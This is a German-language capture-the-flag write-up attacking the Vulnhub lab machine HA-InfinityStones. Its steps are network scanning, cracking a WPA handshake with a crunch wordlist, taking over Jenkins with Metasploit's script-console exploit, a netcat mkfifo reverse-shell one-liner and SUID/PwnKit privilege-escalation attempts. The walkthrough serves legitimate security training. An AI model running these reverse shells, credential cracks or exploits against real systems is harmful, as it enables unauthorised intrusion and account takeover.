HA-InfinityStones - Vulnhub - Level: Medium - Bericht

Medium

Verwendete Tools

arp-scan
vi
nmap
curl
nikto
gobuster
dirb
java
msfconsole
wget
crunch
aircrack-ng
javac
nc

Inhaltsverzeichnis

Reconnaissance

Login User: Stones
morag
Wir kennen die Login Daten zum einloggen
ARP-Scan
192.168.2.160 08:00:27:9c:6d:99 PCS Systemtechnik GmbH
Wir verwenden ARP-Scan, um die IP-Adresse und MAC-Adresse des Zielsystems zu ermitteln. Dies hilft uns, das Zielsystem im Netzwerk zu identifizieren.
/etc/hosts
192.168.2.160 ha-stones.vln
Wir fügen die IP-Adresse und den Hostnamen des Zielsystems zur /etc/hosts-Datei hinzu. Dies ermöglicht uns, das Zielsystem über den Hostnamen anzusprechen.
┌──(root㉿CCat)-[~]
└─# nmap -sS -sC -sV -A -p- $IP -Pn --min-rate 5000 
Starting Nmap 7.94SVN (https://nmap.org) at 2025-01-02 22:30 CET
Nmap scan report for ubuntu (192.168.2.160)
Host is up (0.00013s latency).
Not shown: 65531 closed tcp ports (reset)
PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 84:d2:2e:c4:f7:21:12:54:05:ac:82:c4:05:f2:32:29 (RSA)
|   256 f7:9d:0f:23:ec:d6:de:ed:2b:b2:11:bf:ea:68:3d:b9 (ECDSA)
|_  256 78:ef:fc:36:47:e6:f3:8d:03:3a:39:69:60:4f:2a:71 (ED25519)
80/tcp   open  http     Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: HA:Infinity Stones
443/tcp  open  ssl/http Apache httpd 2.4.29 ((Ubuntu))
|_http-title: HA:Infinity Stones
|_ssl-date: TLS randomness does not represent time
| tls-alpn: 
|_  http/1.1
|_http-server-header: Apache/2.4.29 (Ubuntu)
| ssl-cert: Subject: commonName=ignite/organizationName=MINDSTNE:{4542E4C233F26B4FAF6B5F3FED24280C}/staterProvinceName=UP/countryName=IN
| Not valid before: 2019-09-15T17:18:57
|_Not valid after:  2020-09-14T17:18:57
8080/tcp open  http     Jetty 9.4.z-SNAPSHOT
| http-robots.txt: 1 disallowed entry 
|_/
|_http-server-header: Jetty(9.4.z-SNAPSHOT)
|_http-title: Site doesn't have a title (text/html;charset=utf-8).
MAC Address: 08:00:27:9C:6D:99 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.13 ms ubuntu (192.168.2.160)
Wir führen einen umfassenden Nmap-Scan durch, um offene Ports und Dienste zu identifizieren. Wir verwenden eine hohe Scangeschwindigkeit (--min-rate 5000). Wir finden, dass Port 22 (SSH), Port 80 (HTTP), Port 443 (HTTPS) und Port 8080 (Jetty) offen sind.
┌──(root㉿CCat)-[~]
└─# curl --verbose -I http://192.168.2.160:8080 -s 
*   Trying 192.168.2.160:8080...
* Connected to 192.168.2.160 (192.168.2.160) port 8080
* using HTTP/1.x
> HEAD / HTTP/1.1
> Host: 192.168.2.160:8080
> User-Agent: curl/8.10.1
> Accept: */*
> 
* Request completely sent off
< HTTP/1.1 403 Forbidden
HTTP/1.1 403 Forbidden
< Date: Thu, 02 Jan 2025 21:36:22 GMT
Date: Thu, 02 Jan 2025 21:36:22 GMT
< X-Content-Type-Options: nosniff
X-Content-Type-Options: nosniff
< Set-Cookie: JSESSINID.f32d1263=node0u1c5j566ex9d17b5i2zcxa3lj60.node0;Path=/;HttpOnly
Set-Cookie: JSESSINID.f32d1263=node0u1c5j566ex9d17b5i2zcxa3lj60.node0;Path=/;HttpOnly
< Expires: Thu, 01 Jan 1970 00:00:00 GMT
Expires: Thu, 01 Jan 1970 00:00:00 GMT
< Content-Type: text/html;charset=utf-8
Content-Type: text/html;charset=utf-8
< X-Hudson: 1.395
X-Hudson: 1.395
< X-Jenkins: 2.176.3
X-Jenkins: 2.176.3
< X-Jenkins-Session: 192f54bf
X-Jenkins-Session: 192f54bf
< X-You-Are-Authenticated-As: anonymous
X-You-Are-Authenticated-As: anonymous
< X-You-Are-In-Group-Disabled: JENKINS-39402: use -Dhudson.security.AccessDeniedException2.REPRT_GRUP_HEADERS=true or use /whoAmI to diagnose
X-You-Are-In-Group-Disabled: JENKINS-39402: use -Dhudson.security.AccessDeniedException2.REPRT_GRUP_HEADERS=true or use /whoAmI to diagnose
< X-Required-Permission: hudson.model.Hudson.Read
X-Required-Permission: hudson.model.Hudson.Read
< X-Permission-Implied-By: hudson.security.Permission.GenericRead
X-Permission-Implied-By: hudson.security.Permission.GenericRead
< X-Permission-Implied-By: hudson.model.Hudson.Administer
X-Permission-Implied-By: hudson.model.Hudson.Administer
< Content-Length: 793
Content-Length: 793
< Server: Jetty(9.4.z-SNAPSHOT)
Server: Jetty(9.4.z-SNAPSHOT)
Wir senden eine HEAD-Anfrage an Port 8080 und stellen fest, dass es sich um einen Jetty-Server handelt, der Jenkins hostet. Wir erhalten einen 403 Forbidden-Fehler, da wir keine Berechtigungen haben.
┌──(root㉿CCat)-[~]
└─# nikto -h 192.168.2.160 
- Nikto v2.5.0

+ Target IP:          192.168.2.160
+ Target Hostname:    192.168.2.160
+ Target Port:        80
+ Start Time:         2025-01-02 22:31:43 (GMT+0100)

+ Server: Apache/2.4.29 (Ubuntu)
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ RFC-1918 /images: IP address found in the 'location' header. The IP is "fe80::da6a:fda6:7681:d707". See: https://portswigger.net/kb/issues/00600300_private-ip-addresses-disclosed
+ /images: The web server may reveal its internal or real IP in the Location header via a request to with HTTP/1.0. The value is "fe80::da6a:fda6:7681:d707". See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0649
+ /: Server may leak inodes via ETags, header found with file /, inode: cbd, size: 592a4bf89c606, mtime: gzip. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1418
+ Apache/2.4.29 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ OPTIONS: Allowed HTTP Methods: POST, OPTIONS, HEAD, GET .
+ /img/: Directory indexing found.
+ /img/: This might be interesting.
+ /images/: Directory indexing found.
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ 8102 requests: 0 error(s) and 11 item(s) reported on remote host
+ End Time:           2025-01-02 22:32:30 (GMT+0100) (47 seconds)

+ 1 host(s) tested
Wir verwenden Nikto, um den Webserver auf Port 80 auf Schwachstellen zu überprüfen. Wir stellen fest, dass wichtige Sicherheitsheader fehlen und Directory Indexing aktiviert ist.
┌──(root㉿CCat)-[~]
└─# gobuster dir -u "http://$IP" -w "/usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt" -x txt,php,rar,zip,tar,pub,xls,docx,doc,sql,db,mdb,asp,aspx,accdb,bat,ps1,exe,sh,py,pl,gz,jpeg,jpg,png,html,phtml,xml,csv,dll,pdf,raw,rtf,xlsx,zip,kdbx,bak,svg,pem,crt,json,conf,ELF,elf,c,java,lib,cgi,csh,config,deb,desc,exp,eps,diff,icon,mod,ln,old,rpm,js.map,pHtml" -b '503,404,403' -e --no-error -k 
http://192.168.2.160/index.html           (Status: 200) [Size: 3261]
http://192.168.2.160/images               (Status: 301) [Size: 315] [--> http://192.168.2.160/images/]
http://192.168.2.160/img                  (Status: 301) [Size: 312] [--> http://192.168.2.160/img/]
http://192.168.2.160/wifi                 (Status: 301) [Size: 313] [--> http://192.168.2.160/wifi/]
http://192.168.2.160/aether.php           (Status: 200) [Size: 4955] 
http://192.168.2.160:8080/robots.txt
Wir verwenden Gobuster, um nach versteckten Dateien und Verzeichnissen zu suchen. Wir finden "index.html", "images", "img", "wifi", "aether.php" und das robots.txt auf Port 8080.
------------------------------------------------------------------------------------
http://192.168.2.160:8080/robots.txt
User-agent: *
Disallow: /
Wir betrachten den robots.txt auf Port 8080 und sehen, dass alles blockiert ist.
┌──(root㉿CCat)-[~]
└─# dirb http://192.168.2.160:8080 -X .txt -w 
-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Thu Jan  2 22:41:37 2025
URL_BASE: http://192.168.2.160:8080/
WRDLIST_FILES: /usr/share/dirb/wordlists/common.txt
PTIN: Not Stopping on warning messages
EXTENSIONS_LIST: (.txt) | (.txt) [NUM = 1]

--

GENERATED WORDS: 4612                                                          
+ http://192.168.2.160:8080/robots.txt (CODE:200|SIZE:71)   
--
END_TIME: Thu Jan  2 22:41:50 2025
DOWNLOADED: 4612 - FOUND: 1
Wir verwenden Dirb, um den Webserver nach Dateien zu durchsuchen, und finden die Datei robots.txt.
┌──(root㉿CCat)-[~]
└─# curl -k -4 -s http://192.168.2.160:8080/securityRealm/user/admin/search/index?q=a
HTTP ERRR 404
Problem accessing /securityRealm/user/admin/search/index. Reason:
Not Found
Powered by Jetty:// 9.4.z-SNAPSHOT
Wir versuchen, auf den Jetty-Server zuzugreifen, erhalten aber einen 404-Fehler.
------------------------------------------------------------------------------------
http://192.168.2.160/wifi/ 
Index of /wifi
[ICO]	Name	Last modified	Size	Description



[PARENTDIR]	Parent Directory	 	- 	 
[TXT]	pwd.txt	2019-09-15 09:42 	254 	 
[ ]	reality.cap	2019-09-15 00:43 	262K
Wir navigieren zum Verzeichnis "/wifi" und finden die Dateien "pwd.txt" und "reality.cap".
------------------------------------------------------------------------------------
http://192.168.2.160/wifi/pwd.txt
Your Password is thanos daughter name "gam" (note it's all lower case) plus the following
I enforced new password requirement on you ... 12 characters

ne uppercase charracter
Two Numbers
Two Lowercase
The Year of first avengers came out in threatre
Wir lesen den Inhalt der Datei "pwd.txt" und finden Anweisungen zur Erstellung eines Passworts.
------------------------------------------------------------------------------------
┌──(root㉿CCat)-[~]
└─# crunch 12 12 -t gam,%%@@2012 -o dict.txt 
Crunch will now generate the following amount of data: 22848800 bytes
21 MB
0 GB
0 TB
0 PB
Crunch will now generate the following number of lines: 1757600 

crunch: 100% completed generating output
Wir verwenden Crunch, um eine Wortliste basierend auf den Anweisungen in "pwd.txt" zu erstellen.
┌──(root㉿CCat)-[~]
└─# wget http://192.168.2.160/wifi/reality.cap 
--2025-01-02 23:08:56--  http://192.168.2.160/wifi/reality.cap
Verbindungsaufbau zu 192.168.2.160:80 … verbunden.
HTTP-Anforderung gesendet, auf Antwort wird gewartet … 200 OK
Länge: 267995 (262K) [application/vnd.tcpdump.pcap]
Wird in reality.cap gespeichert.

reality.cap             100%[=======================================>] 261,71K  --.-KB/s    in 0,001s  

2025-01-02 23:08:56 (230 MB/s) - reality.cap gespeichert [267995/267995]
Wir laden die Datei "reality.cap" herunter.
┌──(root㉿CCat)-[~]
└─# aircrack-ng -w dict.txt reality.cap 
                               Aircrack-ng 1.7 

      [00:00:00] 96/1757600 keys tested (4340.75 k/s) 

      Time left: 6 minutes, 44 seconds                           0.01%

                         KEY FUND! [ gamA00fe2012 ]

      Master Key     : 82 35 98 B2 82 D9 D1 3F 7E C7 74 52 68 EC A4 85 
                       2A 91 A7 13 E0 1A B7 5B B5 45 DE 63 5D D0 C9 3B 

      Transient Key  : BA 86 D4 FC C4 C1 55 5E 21 06 76 46 D5 E4 C1 4B 
                       5D A9 2F 40 E8 A2 49 61 6F 3B 0F 4C 81 E7 19 B8 
                       03 E8 2E 64 4C DE EA 9E 1B 2F 2C BD 6B A2 1D F8 
                       AA 41 68 FE 18 30 67 7E F8 89 19 32 61 FB A8 2E 

      EAPOL HMAC     : 99 4E 9F CD 7F 6B B2 60 C6 F8 22 DA DC C3 C1 95
Wir verwenden aircrack-ng, um das Passwort der WPA-Verschlüsselung zu knacken. Wir finden das Passwort gamA00fe2012.
Now, for the next stone, we opened the target IP on the 443 port; it had a redirecting
link on the top right side. Upon clicking on the link, we are redirected to a page where
there is a quiz about avengers, and also some hint related to binary.
http://192.168.2.160/aether.php
Upon solving the quiz, we had got the following answers with their corresponding binary value:
S.No. Questions Answers Binary Value
1. In the beginning, there are 3 infinity stones on earth. False 0
2. At the end, there are two survivors on Titan. True 1
3. Thanos already had the power stone when he first appeared. True 1
4. Tesseract contains the reality stone. False 0
5. The dwarf on Ndavellir is played by Peter Dinklage True 1
6. Red skull is the guardian of space stone. False 0
7. Thor’s new hammer is called stormbuster. False 0
8. Rocket is the only Guardian of the Galaxy to survive the snap. True 1

After solving the quiz and identifying their binary values, we had a binary string i.e.
01101001. We opened this string of binary characters through the URL and there was a
hints.txt and further opened it and found text encrypted through brainfuck algorithm.
------------------------------------------------------------------------------------
http://192.168.2.160/01101001/ 
Index of /01101001
[IC]	Name	Last modified	Size	Description



[PARENTDIR]	Parent Directory	 	- 	 
[TXT]	hints.txt	2019-09-15 09:59 	233
Wir navigieren zum Verzeichnis "/01101001" und finden die Datei "hints.txt".
------------------------------------------------------------------------------------
http://192.168.2.160/01101001/hints.txt
+++++ ++++[ ->+++ +++++ +<]>+ +++++ +++++ +++++ .+++. +++++ ++++. -. +++++ .<+++ ++++[ -> -< ]> .<+++ +++[- >++++ ++<]> +++.< ++++[ ->+++ +<]>+ ++++. <++++ [->-- --<]> -.+++ +++++ +. -. --.<+ ++[->+++<] >++++ .+.<
Wir lesen den Inhalt der Datei "hints.txt" und finden Brainfuck-Code.
+++++ ++++[ ->+++ +++++ +<]>+ +++++ +++++ +++++ .+++. +++++ ++++. -.+++++ .<+++ ++++[ -> -< ]> .<+++ +++[- >++++ ++<]> +++.< ++++[ ->+++ +<]>+ ++++. <++++ [->-- --<]> -.+++ +++++ +. -. --.<+ ++[->+++<] >++++ .+.< admin:avengers
Wir verwenden einen Brainfuck-Interpreter, um den Code zu dekodieren und das Ergebnis lautet admin:avengers.
------------------------------------------------------------------------------------
http://192.168.2.160:8080/
Skip to content
[Jenkins]Jenkins
admin | Abmelden
Wir versuchen auf die Weboberfläche zu gelangen.
------------------------------------------------------------------------------------ Wir melden uns am Jenkinsserver mit admin und avengers.
┌──(root㉿CCat)-[~]
└─# java -jar jenkins-cli.jar -s http://ha-stones.vln:8080/ 
Picked up _JAVA_PTINS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Jan. 02, 2025 11:25:10 PM org.apache.sshd.common.util.security.AbstractSecurityProviderRegistrar getrCreateProvider
INFRMATIN: getrCreateProvider(EdDSA) created instance of net.i2p.crypto.eddsa.EdDSASecurityProvider
java.net.UnknownHostException: ha-stones.vln
	at java.base/sun.nio.ch.NioSocketImpl.connect(NioSocketImpl.java:567)
	at java.base/java.net.Socket.connect(Socket.java:760)
	at java.base/java.net.Socket.connect(Socket.java:695)
	at java.base/sun.net.NetworkClient.doConnect(NetworkClient.java:183)
	at java.base/sun.net.www.http.HttpClient.openServer(HttpClient.java:531)
	at java.base/sun.net.www.http.HttpClient.openServer(HttpClient.java:636)
	at java.base/sun.net.www.http.HttpClient.(HttpClient.java:280)
	at java.base/sun.net.www.http.HttpClient.New(HttpClient.java:386)
	at java.base/sun.net.www.http.HttpClient.New(HttpClient.java:408)
	at java.base/sun.net.www.protocol.http.HttpURLConnection.getNewHttpClient(HttpURLConnection.java:1295)
	at java.base/sun.net.www.protocol.http.HttpURLConnection.plainConnect0(HttpURLConnection.java:1228)
	at java.base/sun.net.www.protocol.http.HttpURLConnection.plainConnect(HttpURLConnection.java:1114)
	at java.base/sun.net.www.protocol.http.HttpURLConnection.connect(HttpURLConnection.java:1043)
	at java.base/sun.net.www.protocol.http.HttpURLConnection.getOutputStream0(HttpURLConnection.java:1445)
	at java.base/sun.net.www.protocol.http.HttpURLConnection.getOutputStream(HttpURLConnection.java:1408)
	at hudson.cli.FullDuplexHttpStream.(FullDuplexHttpStream.java:71)
	at hudson.cli.CLI.plainHttpConnection(CLI.java:279)
	at hudson.cli.CLI._main(CLI.java:271)
	at hudson.cli.CLI.main(CLI.java:83)
Wir verwenden den Jenkins-CLI.
┌──(root㉿CCat)-[~]
└─# msfconsole -q -x "search jenkins_script_console" 
Matching Modules
================

   #  Name                                       Disclosure Date  Rank  Check  Description
   -  ----                                      ---------------  ----  -----  -----------
   0  exploit/multi/http/jenkins_script_console  2013-01-18       good  Yes    Jenkins-CI Script-Console Java Execution
   1    \_ target: Windows                       .                .     .      .
   2    \_ target: Linux                         .                .     .      .
   3    \_ target: Unix CMD                      .                .     .      .


Interact with a module by name or index. For example info 3, use 3 or use exploit/multi/http/jenkins_script_console
After interacting with a module you can manually set a TARGET with set TARGET 'Unix CMD'
Wir suchen nach dem passenden Exploit.
msf6 > use 0
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(multi/http/jenkins_script_console) > options 
Module options (exploit/multi/http/jenkins_script_console):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   API_TKEN                   no        The API token for the specified username
   PASSWRD   avengers         no        The password for the specified username
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHSTS     192.168.2.160    yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPRT      8080             yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                yes       The path to the Jenkins-CI application
   URIPATH                     no        The URI to use for this exploit (default is random)
   USERNAME   admin            no        The username to authenticate as
   VHST                       no        HTTP server virtual host


   When CMDSTAGERFLAVR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPRT  8080             yes       The local port to listen on.
Payload options (windows/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) LHST 192.168.2.199 yes The listen address (an interface may be specified) LPRT 4444 yes The listen port
Exploit target: Id Name -- ---- 2 Unix CMD
View the full module info with the info, or info -d command.
msf6 exploit(multi/http/jenkins_script_console) > show payloads 
Compatible Payloads
=

   #   Name                                                  Disclosure Date  Rank    Check  Description
   -   ----                                                    -    --  --
   0   payload/cmd/unix/adduser                              .                normal  No     Add user with useradd
   1   payload/cmd/unix/bind_awk                             .                normal  No     Unix Command Shell, Bind TCP (via AWK)
   2   payload/cmd/unix/bind_aws_instance_connect            .                normal  No     Unix SSH Shell, Bind Instance Connect (via AWS API)
   3   payload/cmd/unix/bind_busybox_telnetd                 .                normal  No     Unix Command Shell, Bind TCP (via BusyBox telnetd)
   4   payload/cmd/unix/bind_jjs                             .                normal  No     Unix Command Shell, Bind TCP (via jjs)
   5   payload/cmd/unix/bind_lua                             .                normal  No     Unix Command Shell, Bind TCP (via Lua)
   6   payload/cmd/unix/bind_netcat                          .                normal  No     Unix Command Shell, Bind TCP (via netcat)
   7   payload/cmd/unix/bind_netcat_gaping                   .                normal  No     Unix Command Shell, Bind TCP (via netcat -e)
   8   payload/cmd/unix/bind_netcat_gaping_ipv6              .                normal  No     Unix Command Shell, Bind TCP (via netcat -e) IPv6
   9   payload/cmd/unix/bind_nodejs                          .                normal  No     Unix Command Shell, Bind TCP (via nodejs)
   10  payload/cmd/unix/bind_perl                            .                normal  No     Unix Command Shell, Bind TCP (via Perl)
   11  payload/cmd/unix/bind_perl_ipv6                       .                normal  No     Unix Command Shell, Bind TCP (via perl) IPv6
   12  payload/cmd/unix/bind_r                               .                normal  No     Unix Command Shell, Bind TCP (via R)
   13  payload/cmd/unix/bind_ruby                            .                normal  No     Unix Command Shell, Bind TCP (via Ruby)
   14  payload/cmd/unix/bind_ruby_ipv6                       .                normal  No     Unix Command Shell, Bind TCP (via Ruby) IPv6
   15  payload/cmd/unix/bind_socat_sctp                      .                normal  No     Unix Command Shell, Bind SCTP (via socat)
   16  payload/cmd/unix/bind_socat_udp                       .                normal  No     Unix Command Shell, Bind UDP (via socat)
   17  payload/cmd/unix/bind_stub                            .                normal  No     Unix Command Shell, Bind TCP (stub)
   18  payload/cmd/unix/bind_zsh                             .                normal  No     Unix Command Shell, Bind TCP (via Zsh)
   19  payload/cmd/unix/generic                              .                normal  No     Unix Command, Generic Command Execution
   20  payload/cmd/unix/pingback_bind                        .                normal  No     Unix Command Shell, Pingback Bind TCP (via netcat)
   21  payload/cmd/unix/pingback_reverse                     .                normal  No     Unix Command Shell, Pingback Reverse TCP (via netcat)
   22  payload/cmd/unix/python/meterpreter/bind_tcp          
...
.....
msf6 exploit(multi/http/jenkins_script_console) > set payload payload/cmd/unix/python/meterpreter_reverse_tcp
payload => cmd/unix/python/meterpreter_reverse_tcp
msf6 exploit(multi/http/jenkins_script_console) > run 
[*] Started reverse TCP handler on 192.168.2.199:4444 
[*] Checking access to the script console
[*] Logging in...
[*] Using CSRF token: '6fe46b32d0ba77e9a3d2141afbf19d08' (Jenkins-Crumb style v1)
[*] 192.168.2.160:8080 - Sending payload...
[*] Meterpreter session 1 opened (192.168.2.199:4444 -> 192.168.2.160:52120) at 2025-01-02 23:33:33 +0100
meterpreter > getuid
Server username: jenkins
Wir erhalten eine Meterpreter-Session als Benutzer "jenkins".
meterpreter > ls /home 
Listing: /home

Mode              Size  Type  Last modified              Name
----              ----  ----  ---------------              ----
040755/rwxr-xr-x  4096  dir   2019-09-16 06:57:24 +0200  morag
040755/rwxr-xr-x  4096  dir   2019-09-16 08:21:03 +0200  stones
Wir listen den Inhalt des /home Verzeichnis auf.
meterpreter > shell
Process 20503 created.
Channel 1 created.
id
uid=123(jenkins) gid=127(jenkins) groups=127(jenkins)
Wir erstellen eine Shell.
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.2.199 4445 >/tmp/f
rm: cannot remove '/tmp/f': No such file or directory
Wir versuchen eine Reverse Shell zu etablieren.
┌──(root㉿CCat)-[~]
└─# nc -lvnp 4445
listening on [any] 4445 ...
connect to [192.168.2.199] from (UNKNWN) [192.168.2.160] 49158
/bin/sh: 0: can't access tty; job control turned off
$
Wir erhalten eine Shell via netcat.
which python
which python3
/usr/bin/python3
jenkins@ubuntu:/$ stty rows 47 columns 94
jenkins@ubuntu:/$ sudo -l
[sudo] password for jenkins: jenkins@ubuntu:/$ find / -type f -perm -4000 -ls 2>/dev/null 
   131231     28 -rwsr-xr-x   1 root     root        26696 Sep 16  2020 /bin/umount
   134568     44 -rwsr-xr-x   1 root     root        44664 Nov 29  2022 /bin/su
   131155     44 -rwsr-xr-x   1 root     root        43088 Sep 16  2020 /bin/mount
   131130     32 -rwsr-xr-x   1 root     root        30800 Aug 11  2016 /bin/fusermount
   131203     64 -rwsr-xr-x   1 root     root        64424 Mar  9  2017 /bin/ping
   922020     12 -rwsr-xr-x   1 root     root         8304 Sep 15  2019 /opt/script
   134641     76 -rwsr-xr-x   1 root     root        76496 Nov 29  2022 /usr/bin/chfn
   131256     24 -rwsr-xr-x   1 root     root        22520 Jan 12  2022 /usr/bin/pkexec
   134656     76 -rwsr-xr-x   1 root     root        75824 Nov 29  2022 /usr/bin/gpasswd
   134544     24 -rwsr-xr-x   1 root     root        22528 Mar  9  2017 /usr/bin/arping
   134648     44 -rwsr-xr-x   1 root     root        44528 Nov 29  2022 /usr/bin/chsh
   134577     40 -rwsr-xr-x   1 root     root        40344 Nov 29  2022 /usr/bin/newgrp
   135086    148 -rwsr-xr-x   1 root     root       149080 Apr  4  2023 /usr/bin/sudo
   131076     12 -rwsr-xr-x   1 root     root        10312 Aug 16  2022 /usr/bin/vmware-user-suid-wrapper
   135804     20 -rwsr-xr-x   1 root     root        18448 Mar  9  2017 /usr/bin/traceroute6.iputils
   134658     60 -rwsr-xr-x   1 root     root        59640 Nov 29  2022 /usr/bin/passwd
   134834    372 -rwsr-xr--   1 root     dip        378600 Jul 23  2020 /usr/sbin/pppd
   263218     12 -rwsr-xr-x   1 root     root        10232 Mar 27  2017 /usr/lib/eject/dmcrypt-get-device
   273042     12 -rwsr-sr-x   1 root     root        10232 Mar 29  2023 /usr/lib/xorg/Xorg.wrap
   268763     16 -rwsr-xr-x   1 root     root        14328 Jan 12  2022 /usr/lib/policykit-1/polkit-agent-helper-1
   263936    128 -rwsr-xr-x   1 root     root       130264 May 29  2023 /usr/lib/snapd/snap-confine
   271769    428 -rwsr-xr-x   1 root     root         436552 Aug 11  2021 /usr/lib/openssh/ssh-keysign 
       66     40 -rwsr-xr-x   1 root     root               40152 May 15  2019 /snap/core/7713/bin/mount
       80     44 -rwsr-xr-x   1 root     root               44168 May  7  2014 /snap/core/7713/bin/ping
       81     44 -rwsr-xr-x   1 root     root               44680 May  7  2014 /snap/core/7713/bin/ping6 
     7626    386 -rwsr-xr--   1 root     dip               394984 Jun 12  2018 /snap/core/7713/usr/sbin/pppd
Wir suchen nach SUID-Dateien und finden das /opt/script.
Die Ausgabe des Befehls "find / -type f -perm -4000 -ls 2>/dev/null" zeigt eine interessante ausführbare Datei: "/opt/script". Wir untersuchen diese Datei genauer, um festzustellen, ob sie eine Möglichkeit zur Privilege Escalation bietet.
msf6 exploit(multi/http/jenkins_script_console) > use 1
[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > sessions -l
Active sessions = Id Name Type Information Connection -- ---- ---- -- - 1 meterpreter python/linux jenkins @ ubuntu 192.168.2.199:4444 -> 192.168.2.160: 52120 (192.168.2.160)
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > set session 1
session => 1
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > run 
[*] Started reverse TCP handler on 192.168.2.199:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[-] Exploit failed [user-interrupt]: Rex::TimeoutError: Send timed out
[-] run: Interrupted
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > set AutoCheck false"
[-] Parse error: Unmatched quote: "set AutoCheck false\""
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > run 
[*] Started reverse TCP handler on 192.168.2.199:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[-] Exploit failed [user-interrupt]: Rex::TimeoutError: Send timed out
[-] run: Interrupted
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > set AutoCheck false
AutoCheck => false
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > run 
[*] Started reverse TCP handler on 192.168.2.199:4444 
[!] AutoCheck is disabled, proceeding with exploitation
[-] Exploit failed [user-interrupt]: Rex::TimeoutError: Send timed out
[-] run: Interrupted
jenkins@ubuntu:/opt$ strings /opt/script 
/lib64/ld-linux-x86-64.so.2
libc.so.6
printf
__cxa_finalize
__libc_start_main
GLIBC_2.2.5
_ITM_deregisterTMCloneTable
__gmon_start__
_ITM_registerTMCloneTable
AWAVI
AUATL
[]A\A]A^A_
TIMESTNE:{141BC86DFD5C40E3CC37219C18D471CA}
;*3$"
GCC: (Ubuntu 7.4.0-1ubuntu1~18.04.1) 7.4.0
crtstuff.c
deregister_tm_clones
__do_global_dtors_aux
completed.7697
__do_global_dtors_aux_fini_array_entry
frame_dummy
__frame_dummy_init_array_entry
script.c
__FRAME_END__
__init_array_end
_DYNAMIC
__init_array_start
__GNU_EH_FRAME_HDR
_GLBAL_FFSET_TABLE_
__libc_csu_fini
_ITM_deregisterTMCloneTable
_edata
printf@@GLIBC_2.2.5
__libc_start_main@@GLIBC_2.2.5
__data_start
__gmon_start__
__dso_handle
Wir verwenden den Befehl "strings", um lesbare Zeichenketten in der Datei "/opt/script" zu finden. Wir entdecken die Zeichenkette "TIMESTNE:{141BC86DFD5C40E3CC37219C18D471CA}", die wie ein MD5-Hash aussieht.
jenkins@ubuntu:/var/www/html$ ls -la
total 72 drwxrwxrwx 7 root root 4096 Sep 15 2019 . drwxr-xr-x 3 root root 4096 Sep 15 2019 .. drwxrwxrwx 2 root root 4096 Sep 15 2019 01101001 -rw-rw-r-- 1 stones stones 4955 Sep 15 2019 aether.php -rw-rw-r-- 1 stones stones 584 Mar 24 2009 astyle.css drwxrwxrwx 2 root root 4096 Sep 15 2019 gamA00fe2012 drwxr-xr-x 2 stones stones 4096 Sep 15 2019 images drwxrwxrwx 2 root root 4096 Sep 15 2019 img -rw-rw-r-- 1 stones stones 3261 Sep 15 2019 index.html -rw-rw-r-- 1 stones stones 23358 Sep 16 2019 style.css -rw-rw-r-- 1 stones stones 115 Sep 16 2019 tesseract.html drwxrwxrwx 2 root root 4096 Sep 15 2019 wifi
Wir listen den Inhalt des /var/www/html verzeichnis auf.
jenkins@ubuntu:/var/www/html$ cd gamA00fe2012
jenkins@ubuntu:/var/www/html/gamA00fe2012$ ls -la 
total 12
drwxrwxrwx 2 root root 4096 Sep 15  2019 .
drwxrwxrwx 7 root root 4096 Sep 15  2019 ..
-rwxrwxrwx 1 root root   48 Sep 15  2019 realitystone.txt
Wir navigieren zum Verzeichnis "gamA00fe2012" und listen den Inhalt auf. Wir finden die Datei "realitystone.txt".
